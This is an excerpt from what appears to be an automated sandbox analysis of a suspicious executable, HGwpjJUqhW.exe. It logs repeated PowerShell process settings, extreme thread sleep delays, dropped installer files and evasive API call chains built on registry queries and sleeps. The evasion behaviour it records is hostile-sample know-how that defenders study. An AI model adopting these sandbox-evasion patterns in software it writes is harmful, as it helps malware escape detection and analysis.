                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00D8B928 rdtsc 11_2_00D8B928
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6328Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3479Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeWindow / User API: threadDelayed 1181Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeWindow / User API: threadDelayed 3398Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeWindow / User API: threadDelayed 4485Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5021Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 508Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7398Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1878Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4047
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2368
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-10435
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\pc_yyb_2700200680_installer[1].exeJump to dropped file
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeDropped PE file which has not been started: C:\Users\user\Downloads\pc_yyb_2700200680_installer.exeJump to dropped file
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_5-43837
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_5-43839
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7528Thread sleep count: 6328 > 30Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7532Thread sleep count: 3479 > 30Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7568Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe TID: 3168Thread sleep time: -30000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe TID: 7544Thread sleep count: 271 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe TID: 7484Thread sleep count: 1181 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe TID: 7484Thread sleep time: -1181000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe TID: 7528Thread sleep count: 3398 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe TID: 7528Thread sleep time: -33980s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe TID: 7484Thread sleep count: 4485 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe TID: 7484Thread sleep time: -4485000s >= -30000sJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7792Thread sleep count: 5021 > 30Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7824Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7796Thread sleep count: 508 > 30Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7812Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7964Thread sleep count: 7398 > 30Jump to behavior
